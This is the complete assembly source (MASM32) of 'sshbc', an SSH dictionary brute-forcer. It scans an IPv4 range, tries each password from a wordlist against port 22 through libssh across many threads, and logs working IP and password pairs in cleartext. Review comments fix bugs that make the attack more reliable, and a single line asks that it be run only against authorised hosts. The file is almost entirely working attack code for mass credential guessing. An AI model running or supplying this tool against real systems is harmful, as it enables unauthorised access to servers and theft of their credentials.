- ---------------------------------------------ssh.inc-----------------------------------------------
- ; ssh.inc: names and storage for the libssh entry points that sshbc resolves
- ; at run time (see load_ssh) instead of binding them through the import library.
- ;
- ; Values of libssh's ssh_options_e enum. Only SSH_OPTIONS_HOST is used by this
- ; tool (ssh_check pushes the host option); SSH_OPTIONS_FD / SSH_OPTIONS_USER are
- ; unused and their numbers are not checked anywhere — verify them against the
- ; libssh.h of the libssh build that produced ssh.dll before relying on them.
- SSH_OPTIONS_HOST equ 0
- SSH_OPTIONS_FD equ 3
- SSH_OPTIONS_USER equ 5
- .data
- ; Library name and export names handed to LoadLibrary / GetProcAddress.
- ; NOTE(review): "ssh.dll" is a bare name, so it is found via the default DLL
- ; search order (application directory, CWD, ...); a planted ssh.dll would run
- ; with this process's rights. Use a full path or LoadLibraryEx search flags
- ; if that matters for how this tool is deployed.
- sshlib db "ssh.dll",0
- sshn db "ssh_new", 0
- ssh_opt_set db "ssh_options_set",0
- ssh_conn db "ssh_connect",0
- ssh_authpass db "ssh_userauth_password",0
- ssh_dis db "ssh_disconnect", 0
- ssh_f db "ssh_free",0
- .data?
- ; Resolved function pointers, filled in by load_ssh; called indirectly with a
- ; plain `call` from ssh_check. They are zero until load_ssh succeeds, so
- ; calling through them before that (or after a failed lookup) crashes.
- ssh_new dd ?
- ssh_options_set dd ?
- ssh_connect dd ?
- ssh_userauth_password dd ?
- ssh_disconnect dd ?
- ssh_free dd ?
- ---------------------------------------------sshbc.Inc-----------------------------------------------
- include windows.inc
- include kernel32.inc
- include user32.inc
- include ntdll.inc
- include ssh.inc
- include ws2_32.inc
- include wsock32.inc
- include \masm32\macros\macros.asm
- includelib ws2_32.lib
- includelib kernel32.lib
- includelib user32.lib
- includelib ntdll.lib
- includelib masm32.lib
- includelib .\ssh\ssh.lib
- ; Prototypes for the procedures defined in sshbc.asm.
- load_ssh PROTO                              ; resolve the ssh.dll exports
- ssh_check PROTO:DWORD, :DWORD, :DWORD       ; (ip, username, password) -> al: 0 ok, 1 denied, other = error
- read_string PROTO:DWORD, :DWORD, :DWORD, :DWORD ; (dst, offset, hFile, fileSize) -> next offset
- get_ip PROTO:DWORD, :DWORD                  ; (startIP, endIP) -> next target or 0
- res_write PROTO:DWORD, :DWORD, :DWORD       ; (outfile, ip, password): append a hit
- new_thread PROTO:DWORD                      ; worker thread body; param = target ip
- cmdlin_parse PROTO:DWORD                    ; (command line) -> fills the globals below
- create_hex PROTO:DWORD                      ; ("-tNN...") -> NN as a number
- copy_cmd_str PROTO:DWORD, :DWORD            ; ("-xVALUE ...", dst): copy VALUE
- ;const
- WS_VER equ 202h                             ; Winsock 2.2 for WSAStartup
- SSH_PORT equ 22                             ; TCP port probed before the SSH session
- .data
- wsaErr db "WSAStartup error!",0dh,0ah
- sockErr db "Socket open error!",0dh,0ah
- sshErr db "Failure establishing SSH session!",0dh,0ah
- ; Usage text. It spans several db lines, so `sizeof usage` covers only the
- ; first line; callers must measure it at run time (it is NUL-terminated)
- ; rather than hard-coding a byte count.
- usage db "Created by Bearchik(http://crazyasm.blogspot.com)",0dh,0ah
- db "USAGE:",0dh,0ah
- db " -t threads counter",0dh,0ah
- db " -s start IP",0dh,0ah
- db " -e end IP",0dh,0ah
- db " -u username",0dh,0ah
- db " -d dictionary filename",0dh,0ah
- db " -o output filename",0dh,0ah
- db "EXAMPLE:",0dh,0ah
- db "sshbc.exe -t10 -s192.168.1.0 -e192.168.255.0 -uroot -dfiledict.txt -ofile_out.txt",0dh,0ah,0h
- finishmsg db "Work is FINISHED!",0dh,0ah
- .data?
- ; Command-line values, filled by cmdlin_parse via copy_cmd_str. The copies are
- ; not length-checked by copy_cmd_str, so an over-long argument overruns these
- ; fixed buffers — the parser must validate the length before copying.
- ooutfile db 512 dup (?)                     ; -o output filename (cleartext credentials)
- fdict db 512 dup (?)                        ; -d dictionary filename
- username db 256 dup (?)                     ; -u user name
- startIP db 16 dup (?)                       ; -s dotted quad (15 chars + NUL max)
- endIP db 16 dup (?)                         ; -e dotted quad (15 chars + NUL max)
- stdhndl dd ?                                ; STD_OUTPUT_HANDLE for WriteConsole
- siptmp dd ?                                 ; get_ip cursor; starts zero, which get_ip uses as "not started"
- sip dd ?                                    ; startIP as returned by inet_addr (network order)
- eip dd ?                                    ; endIP as returned by inet_addr
- pThread dd ?                                ; thread id slot for CreateThread
- tflag dd ?                                  ; number of live workers; shared between the main thread and workers
- cThread dd ?                                ; -t: maximum number of concurrent workers
- cmdflag dd ?                                ; number of recognised options; must reach exactly 6
- ---------------------------------------------sshbc.asm-----------------------------------------------
- .386
- .model flat, stdcall ;32 bit memory model
- option casemap :none ;case sensitive
- include sshbc.Inc
- .code
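- .data
- sshLoadErr db "Cannot load ssh.dll or one of its exports!",0dh,0ah,0
- .code
- ; Entry point.
- ; Resolves ssh.dll, parses the command line, then hands out one target
- ; address per worker (new_thread) while keeping at most cThread workers
- ; alive, and waits for all of them before exiting.
- ; This is a credential-guessing tool: run it only against hosts you are
- ; authorised to test, and treat the -o file as sensitive (cleartext secrets).
- start:
-     invoke GetStdHandle, STD_OUTPUT_HANDLE
-     mov stdhndl, eax
-     ; load_ssh leaves eax = 0 when ssh.dll or an export could not be resolved;
-     ; calling through null function pointers later would just crash.
-     invoke load_ssh
-     .if eax == 0
-         invoke WriteConsole, stdhndl, offset sshLoadErr, sizeof sshLoadErr - 1, NULL, NULL
-         invoke ExitProcess, 1
-     .endif
-     invoke GetCommandLine
-     invoke cmdlin_parse, eax
-     ; every option exactly once; a worker count of 0 would spin forever below
-     .if cmdflag != 6 || cThread == 0
-         jmp bad_usage
-     .endif
-     ; convert the range once (the original did this on every iteration);
-     ; inet_addr returns INADDR_NONE (-1) for a malformed dotted quad
-     invoke inet_addr, offset startIP
-     .if eax == -1
-         jmp bad_usage
-     .endif
-     mov sip, eax
-     invoke inet_addr, offset endIP
-     .if eax == -1
-         jmp bad_usage
-     .endif
-     mov eip, eax
- next_target:
-     invoke get_ip, sip, eip
-     .if eax == 0
-         jmp wait_workers            ; range exhausted
-     .endif
-     ; count the worker before it exists: a fast worker could otherwise
-     ; decrement tflag before this thread increments it. lock keeps the
-     ; read-modify-write atomic against the workers' decrements.
-     lock inc DWORD PTR tflag
-     invoke CreateThread, NULL, 10240, offset new_thread, siptmp, 0, offset pThread
-     .if eax == NULL
-         lock dec DWORD PTR tflag    ; this target is skipped
-         jmp throttle
-     .endif
-     invoke CloseHandle, eax         ; handle not needed; tflag tracks completion
- throttle:
-     ; block while all cThread slots are busy
-     mov eax, tflag
-     .if eax >= cThread
-         invoke SleepEx, 1, 0
-         jmp throttle
-     .endif
-     jmp next_target
- wait_workers:
-     invoke SleepEx, 1, 0
-     cmp tflag, 0
-     jne wait_workers
-     invoke WriteConsole, stdhndl, offset finishmsg, sizeof finishmsg, NULL, NULL
-     invoke ExitProcess, 0
- bad_usage:
-     ; usage spans several db lines, so measure it instead of hard-coding 109h
-     invoke lstrlen, offset usage
-     invoke WriteConsole, stdhndl, offset usage, eax, NULL, NULL
-     invoke ExitProcess, 1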
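- ; arg_fits: checks the value that follows a "-x" key at keyptr.
- ; Returns eax = 1 when the value (up to the next space or NUL) is non-empty
- ; and shorter than maxlen bytes, i.e. it fits a maxlen-byte buffer with its
- ; NUL; eax = 0 otherwise. Clobbers ecx.
- arg_fits proc uses esi keyptr:DWORD, maxlen:DWORD
-     mov esi, keyptr
-     add esi, 2                      ; value starts right after "-x"
-     xor eax, eax                    ; eax = value length so far
- measure:
-     mov cl, BYTE PTR [esi+eax]
-     .if cl == 20h || cl == 0
-         jmp measured
-     .endif
-     inc eax
-     .if eax < maxlen
-         jmp measure
-     .endif
-     xor eax, eax                    ; too long for the destination buffer
-     ret
- measured:
-     .if eax != 0
-         mov eax, 1
-     .endif
-     ret
- arg_fits endp
- 
- ; cmdlin_parse: scans the command line for -t -s -e -u -d -o and stores
- ; each value in its global (cThread, startIP, endIP, username, fdict,
- ; ooutfile), incrementing cmdflag once per accepted option.
- ; A key is only recognised at the start of a token (line start or after a
- ; space), so "-dfile-test.txt" no longer registers as "-t"; a value that is
- ; empty or would overflow its buffer is ignored, which leaves cmdflag short
- ; of 6 and makes the caller print the usage text.
- ; edi is callee-saved in the Win32 ABI, hence `uses edi`.
- cmdlin_parse proc uses edi cmd:DWORD
-     mov edi, cmd
- next_key:
-     mov al, BYTE PTR [edi]
-     .if al == 0
-         ret
-     .endif
-     .if edi != cmd
-         .if BYTE PTR [edi-1] != 20h
-             jmp advance             ; inside a token: never a key
-         .endif
-     .endif
-     .if al != 2dh                   ; '-'
-         jmp advance
-     .endif
-     mov al, BYTE PTR [edi+1]
-     .if al == 74h                   ; -t thread count (max 10 digits)
-         invoke arg_fits, edi, 11
-         .if eax != 0
-             invoke create_hex, edi
-             mov cThread, eax
-             inc cmdflag
-         .endif
-     .elseif al == 73h               ; -s start IP
-         invoke arg_fits, edi, SIZEOF startIP
-         .if eax != 0
-             invoke copy_cmd_str, edi, offset startIP
-             inc cmdflag
-         .endif
-     .elseif al == 65h               ; -e end IP
-         invoke arg_fits, edi, SIZEOF endIP
-         .if eax != 0
-             invoke copy_cmd_str, edi, offset endIP
-             inc cmdflag
-         .endif
-     .elseif al == 75h               ; -u user name
-         invoke arg_fits, edi, SIZEOF username
-         .if eax != 0
-             invoke copy_cmd_str, edi, offset username
-             inc cmdflag
-         .endif
-     .elseif al == 64h               ; -d dictionary file
-         invoke arg_fits, edi, SIZEOF fdict
-         .if eax != 0
-             invoke copy_cmd_str, edi, offset fdict
-             inc cmdflag
-         .endif
-     .elseif al == 6fh               ; -o output file
-         invoke arg_fits, edi, SIZEOF ooutfile
-         .if eax != 0
-             invoke copy_cmd_str, edi, offset ooutfile
-             inc cmdflag
-         .endif
-     .endif
- advance:
-     inc edi
-     jmp next_key
- cmdlin_parse endp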
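- ; copy_cmd_str: copies the value that follows a "-x" key at strnum into
- ; outstr, stopping at the first space or NUL, and NUL-terminates it.
- ; The terminator is tested before each byte is stored, so an empty value
- ; yields "" (the original stored one byte unconditionally, copying the
- ; space of "-u " and reading past the NUL of a trailing "-u").
- ; No length is known here: the caller must check the value fits outstr
- ; beforehand. esi/edi are callee-saved in the Win32 ABI, hence `uses`;
- ; ebx is no longer touched.
- copy_cmd_str proc uses esi edi strnum:DWORD, outstr:DWORD
-     mov esi, strnum
-     add esi, 2                      ; skip "-x"
-     mov edi, outstr
- copy_loop:
-     mov al, BYTE PTR [esi]
-     .if al == 20h || al == 0
-         jmp copy_done
-     .endif
-     mov BYTE PTR [edi], al
-     inc esi
-     inc edi
-     jmp copy_loop
- copy_done:
-     mov BYTE PTR [edi], 0
-     ret
- copy_cmd_str endp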
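- ; create_hex: parses the decimal number that follows a "-t" key at stnum
- ; (the name is historical; the value is decimal) up to the next space or
- ; NUL and returns it in eax. Returns 0 when the value is empty or contains
- ; a non-digit, so the caller's cThread check can reject it.
- ; Rewritten as a forward accumulate (n = n*10 + digit) instead of the
- ; original backward scan, which mis-parsed "-t " (no digits) by treating
- ; 't' and '-' as digits. esi is callee-saved, hence `uses esi`; ebx is no
- ; longer clobbered.
- create_hex proc uses esi stnum:DWORD
-     mov esi, stnum
-     add esi, 2                      ; skip "-t"
-     xor ecx, ecx                    ; ecx = value accumulated so far
- next_digit:
-     movzx eax, BYTE PTR [esi]
-     .if eax == 20h || eax == 0
-         jmp digits_done
-     .endif
-     sub eax, 30h                    ; '0'..'9' -> 0..9; anything else wraps above 9
-     .if eax > 9
-         xor eax, eax                ; malformed value
-         ret
-     .endif
-     lea ecx, [ecx+ecx*4]            ; ecx *= 5
-     lea ecx, [eax+ecx*2]            ; ecx = ecx*2 + digit  (old*10 + digit)
-     inc esi
-     jmp next_digit
- digits_done:
-     mov eax, ecx
-     ret
- create_hex endp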
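- ; new_thread: worker body (stdcall, one DWORD param = target ip in network
- ; order as produced by inet_addr). Walks the dictionary file line by line,
- ; trying each line as the password for `username` on the target; a hit is
- ; appended to ooutfile by res_write. The worker stops at the first hit, at
- ; end of dictionary, or when ssh_check reports anything other than
- ; "denied" (host unreachable / SSH error). On exit it prints the target
- ; and decrements the shared worker counter tflag.
- new_thread proc pip:DWORD
-     LOCAL sfile:DWORD               ; dictionary size in bytes
-     LOCAL dist:DWORD                ; offset of the next dictionary line
-     LOCAL fHandle:DWORD
-     LOCAL nLen:DWORD
-     LOCAL password[128]:BYTE        ; NOTE(review): read_string must store at most 127 bytes here — confirm it bounds the copy
-     LOCAL ipaddr[20]:BYTE           ; dotted quad (15) + CRLF + NUL
-     invoke RtlIpv4AddressToString, ADDR pip, ADDR ipaddr
-     mov dist, 0
-     ; OPEN_EXISTING: a missing dictionary is an error, not a reason to
-     ; create an empty file (the original used OPEN_ALWAYS and never
-     ; checked the handle).
-     invoke CreateFile, offset fdict, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL
-     .if eax == INVALID_HANDLE_VALUE
-         jmp thread_done_nofile
-     .endif
-     mov fHandle, eax
-     invoke GetFileSize, fHandle, NULL
-     .if eax == -1                   ; INVALID_FILE_SIZE
-         jmp thread_done
-     .endif
-     mov sfile, eax
- next_pass:
-     mov eax, dist
-     .if eax > sfile                 ; read_string returns > sfile once the file is used up
-         jmp thread_done
-     .endif
-     invoke read_string, ADDR password, dist, fHandle, sfile
-     mov dist, eax
-     invoke ssh_check, pip, offset username, ADDR password
-     .if al == 1
-         jmp next_pass               ; denied: try the next candidate
-     .endif
-     .if al == 0
-         invoke res_write, offset ooutfile, pip, ADDR password
-     .endif
-     ; any other code: give up on this host
- thread_done:
-     invoke CloseHandle, fHandle
- thread_done_nofile:
-     ; print "<ip>\r\n"; the original wrote 16 raw bytes including the NUL
-     ; and whatever followed it on the stack
-     invoke lstrlen, ADDR ipaddr
-     lea edx, ipaddr
-     mov BYTE PTR [edx+eax], 0dh
-     mov BYTE PTR [edx+eax+1], 0ah
-     add eax, 2
-     mov nLen, eax
-     invoke WriteConsole, stdhndl, ADDR ipaddr, nLen, NULL, NULL
-     ; decrement last: once tflag reaches 0 the main thread may ExitProcess,
-     ; and lock keeps the decrement atomic against the main thread's increments
-     lock dec DWORD PTR tflag
-     ret
- new_thread endp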
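- IFNDEF FILE_APPEND_DATA
- FILE_APPEND_DATA equ 0004h
- ENDIF
- OUT_LINE_MAX equ 160                ; 15 (ip) + ';' + up to 127 (password) + CRLF + NUL, with slack
- ; res_write: appends "<ip>;<password>\r\n" to outfile (created if missing).
- ; The file holds working credentials in cleartext — restrict access to it
- ; and remove it when the engagement is over.
- ; The line is built with bounded copies so a long password cannot overrun
- ; outString (the original copied it unbounded into 128 bytes). The file is
- ; opened with append-only access, so each WriteFile lands at end of file
- ; without the SetFilePointer(FILE_END)+WriteFile sequence that let two
- ; workers overwrite each other's line.
- res_write proc uses edi outfile:DWORD, pip:DWORD, password:DWORD
-     LOCAL cWrite:DWORD
-     LOCAL nByte:DWORD
-     LOCAL room:DWORD
-     LOCAL fouthandle:DWORD
-     LOCAL ipaddr[16]:BYTE
-     LOCAL outString[OUT_LINE_MAX]:BYTE
-     invoke RtlIpv4AddressToString, ADDR pip, ADDR ipaddr
-     invoke lstrcpy, ADDR outString, ADDR ipaddr     ; dotted quad: at most 15 chars
-     invoke lstrlen, ADDR outString
-     lea edi, outString
-     add edi, eax
-     mov BYTE PTR [edi], 3bh                          ; ';' separator
-     inc edi
-     ; room = characters left for the password so that CRLF and NUL still fit;
-     ; lstrcpyn's count includes the terminating NUL
-     lea eax, outString
-     add eax, OUT_LINE_MAX - 3
-     sub eax, edi
-     inc eax
-     mov room, eax
-     invoke lstrcpyn, edi, password, room
-     invoke lstrlen, edi
-     add edi, eax
-     mov BYTE PTR [edi], 0dh
-     mov BYTE PTR [edi+1], 0ah
-     mov BYTE PTR [edi+2], 0
-     invoke CreateFile, outfile, FILE_APPEND_DATA, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
-     .if eax == INVALID_HANDLE_VALUE
-         ret                                          ; nothing to close; the hit is lost, as before
-     .endif
-     mov fouthandle, eax
-     invoke lstrlen, ADDR outString
-     mov nByte, eax
-     invoke WriteFile, fouthandle, ADDR outString, nByte, ADDR cWrite, NULL
-     invoke CloseHandle, fouthandle
-     ret
- res_write endp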
- ; get_ip: hands out the next target address in the range [sIP, eIP].
- ; Addresses are the dwords returned by inet_addr. The first call (siptmp
- ; still zero) returns sIP; later calls step siptmp by one, carrying from the
- ; last octet upward, and return the new value; once eIP has been handed out
- ; every further call returns 0.
- ; Caveats: the zero sentinel means a start of 0.0.0.0 is re-issued on every
- ; call, and a start above the end wraps through the whole address space
- ; before stopping.
- get_ip proc sIP:DWORD, eIP:DWORD
-     mov eax, siptmp
-     .if eax == 0
-         mov eax, sIP                ; first call: start of the range
-         mov siptmp, eax
-         ret
-     .endif
-     .if eax == eIP
-         xor eax, eax                ; end already handed out
-         ret
-     .endif
-     ; inet_addr stores a.b.c.d in memory order, so [siptmp+3] is the last
-     ; octet; increment it and ripple the carry towards the first octet
-     inc BYTE PTR [siptmp+3]
-     jnz @F
-     inc BYTE PTR [siptmp+2]
-     jnz @F
-     inc BYTE PTR [siptmp+1]
-     jnz @F
-     inc BYTE PTR [siptmp]
- @@:
-     mov eax, siptmp
-     ret
- get_ip endp
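- PASS_BUF_MAX equ 128                ; size of new_thread's LOCAL password buffer — keep in sync
- ; read_string: copies the dictionary line that starts at file offset d into
- ; pass (NUL-terminated) and returns the offset of the next line, or a value
- ; greater than sfile when no more lines remain (that is what the caller's
- ; "sfile < dist" loop test checks for).
- ; Fixes over the original: lines are terminated by LF, CRLF or a lone CR
- ; (CRLF was assumed, so LF-only files became a single huge "password");
- ; the copy is bounded to PASS_BUF_MAX-1 bytes, so an over-long line no
- ; longer overruns the caller's stack buffer; the last line is always
- ; NUL-terminated (the EOF path left it unterminated) and its final byte
- ; is no longer duplicated by a zero-byte read at EOF; the file pointer is
- ; set once per call rather than before every byte, since ReadFile advances it.
- ; esi/edi are callee-saved, hence `uses`.
- read_string proc uses esi edi pass:DWORD, d:DWORD, fHandle:DWORD, sfile:DWORD
-     LOCAL buf:BYTE
-     LOCAL cRead:DWORD
-     mov edi, pass
-     xor esi, esi                    ; esi = bytes stored in pass so far
-     mov eax, d
-     .if eax >= sfile
-         jmp eof_reached
-     .endif
-     invoke SetFilePointer, fHandle, d, NULL, FILE_BEGIN
- next_byte:
-     invoke ReadFile, fHandle, ADDR buf, 1, ADDR cRead, NULL
-     .if eax == 0 || cRead == 0
-         jmp eof_reached
-     .endif
-     inc d
-     mov al, buf
-     .if al == 0ah
-         jmp line_done
-     .endif
-     .if al == 0dh
-         ; swallow a following LF so CRLF counts as one terminator; a lone
-         ; CR leaves d at the next byte, which the next call seeks to
-         invoke ReadFile, fHandle, ADDR buf, 1, ADDR cRead, NULL
-         .if eax != 0 && cRead == 1
-             .if buf == 0ah
-                 inc d
-             .endif
-         .endif
-         jmp line_done
-     .endif
-     .if esi < PASS_BUF_MAX - 1
-         mov BYTE PTR [edi+esi], al
-         inc esi                     ; bytes past the cap are read but dropped
-     .endif
-     jmp next_byte
- eof_reached:
-     mov BYTE PTR [edi+esi], 0
-     mov eax, sfile
-     inc eax                         ; > sfile: tells the caller the file is used up
-     ret
- line_done:
-     mov BYTE PTR [edi+esi], 0
-     mov eax, d
-     .if eax >= sfile
-         mov eax, sfile              ; the terminator was the last byte: no further line
-         inc eax
-     .endif
-     ret
- read_string endp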
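- ; libssh return codes (SSH_OK and enum ssh_auth_e). Confirm them against the
- ; libssh.h matching the ssh.dll actually shipped with this tool.
- SSH_OK           equ 0
- SSH_AUTH_SUCCESS equ 0
- SSH_AUTH_DENIED  equ 1
- SSH_AUTH_PARTIAL equ 2
- ; ssh_check: tries one (uname, pass) pair against ip (network-order dword).
- ; Returns in eax/al: 0 = the password was accepted (success or partial
- ; success), 1 = denied, -1 = could not test (port 22 unreachable, Winsock
- ; or libssh setup failure, SSH connect failure, or an auth *error*).
- ; The original returned its status by pushing it and popping at a shared
- ; exit label; on the Winsock, socket and ssh_options_set failure paths
- ; nothing had been pushed, so a garbage byte was returned and could read
- ; as 0 — a false "valid credential". It also mapped every auth result
- ; other than DENIED (including SSH_AUTH_ERROR) to success, and never
- ; checked ssh_connect. Each libssh call is cdecl: the caller pops the args.
- ; NOTE(review): no host-key check (ssh_is_server_known) is performed, so the
- ; credentials tried here are handed to whatever answers on port 22.
- ssh_check proc ip:DWORD, uname:DWORD, pass:DWORD
-     LOCAL sess:DWORD
-     LOCAL sock:DWORD
-     LOCAL rc:DWORD
-     LOCAL result:DWORD
-     LOCAL saddr:sockaddr_in
-     LOCAL ws:WSADATA
-     LOCAL ipaddr[16]:BYTE
-     mov result, -1
-     invoke WSAStartup, WS_VER, ADDR ws
-     .if eax != 0
-         invoke WriteConsole, stdhndl, offset wsaErr, sizeof wsaErr, NULL, NULL
-         jmp done
-     .endif
-     ; cheap TCP probe of port 22 before paying for a libssh session
-     invoke socket, AF_INET, SOCK_STREAM, IPPROTO_TCP
-     .if eax == -1                   ; INVALID_SOCKET
-         invoke WriteConsole, stdhndl, offset sockErr, sizeof sockErr, NULL, NULL
-         jmp wsa_done
-     .endif
-     mov sock, eax
-     invoke htons, SSH_PORT
-     mov saddr.sin_port, ax
-     mov eax, ip
-     mov saddr.sin_addr, eax
-     mov saddr.sin_family, AF_INET
-     invoke connect, sock, ADDR saddr, SIZEOF saddr
-     mov rc, eax
-     invoke closesocket, sock        ; libssh opens its own connection
-     .if rc == -1                    ; SOCKET_ERROR: host/port unreachable
-         jmp wsa_done
-     .endif
-     call ssh_new
-     .if eax == 0
-         invoke WriteConsole, stdhndl, offset sshErr, sizeof sshErr, NULL, NULL
-         jmp wsa_done
-     .endif
-     mov sess, eax
-     invoke RtlIpv4AddressToString, ADDR ip, ADDR ipaddr
-     ; ssh_options_set(sess, SSH_OPTIONS_HOST, ipaddr)
-     lea eax, ipaddr
-     push eax
-     push SSH_OPTIONS_HOST
-     push sess
-     call ssh_options_set
-     add esp, 12
-     .if eax != SSH_OK
-         invoke WriteConsole, stdhndl, offset sshErr, sizeof sshErr, NULL, NULL
-         jmp free_sess
-     .endif
-     ; ssh_connect(sess)
-     push sess
-     call ssh_connect
-     add esp, 4
-     .if eax != SSH_OK
-         jmp free_sess               ; no session: not a credential verdict
-     .endif
-     ; ssh_userauth_password(sess, uname, pass)
-     push pass
-     push uname
-     push sess
-     call ssh_userauth_password
-     add esp, 12
-     .if eax == SSH_AUTH_SUCCESS || eax == SSH_AUTH_PARTIAL
-         mov result, 0               ; password accepted
-     .elseif eax == SSH_AUTH_DENIED
-         mov result, 1
-     .endif                          ; SSH_AUTH_ERROR and anything else: stays -1
-     push sess
-     call ssh_disconnect
-     add esp, 4
- free_sess:
-     push sess
-     call ssh_free
-     add esp, 4
- wsa_done:
-     invoke WSACleanup
- done:
-     mov eax, result
-     ret
- ssh_check endp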
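- ; load_ssh: loads ssh.dll and resolves the six libssh entry points into the
- ; function-pointer globals declared in ssh.inc.
- ; Returns eax = 1 on success, 0 when the library or any export is missing
- ; (the original returned whatever the last GetProcAddress produced and the
- ; caller then called through null pointers).
- ; NOTE(review): "ssh.dll" is a bare name, so LoadLibrary walks the default
- ; search order (exe directory, current directory, ...); a planted ssh.dll
- ; would execute with this process's rights. Use a full path, or
- ; LoadLibraryEx with LOAD_LIBRARY_SEARCH_* flags, if that matters here.
- load_ssh proc
-     LOCAL a_lib:DWORD
-     invoke LoadLibrary, offset sshlib
-     .if eax == NULL
-         jmp fail
-     .endif
-     mov a_lib, eax
-     invoke GetProcAddress, a_lib, offset sshn
-     .if eax == NULL
-         jmp fail
-     .endif
-     mov ssh_new, eax
-     invoke GetProcAddress, a_lib, offset ssh_opt_set
-     .if eax == NULL
-         jmp fail
-     .endif
-     mov ssh_options_set, eax
-     invoke GetProcAddress, a_lib, offset ssh_conn
-     .if eax == NULL
-         jmp fail
-     .endif
-     mov ssh_connect, eax
-     invoke GetProcAddress, a_lib, offset ssh_authpass
-     .if eax == NULL
-         jmp fail
-     .endif
-     mov ssh_userauth_password, eax
-     invoke GetProcAddress, a_lib, offset ssh_dis
-     .if eax == NULL
-         jmp fail
-     .endif
-     mov ssh_disconnect, eax
-     invoke GetProcAddress, a_lib, offset ssh_f
-     .if eax == NULL
-         jmp fail
-     .endif
-     mov ssh_free, eax
-     mov eax, 1
-     ret
- fail:
-     xor eax, eax
-     ret
- load_ssh endp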
- end start